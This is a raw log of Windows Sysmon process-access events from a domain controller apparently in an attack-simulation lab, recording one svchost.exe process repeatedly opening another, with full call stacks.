13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
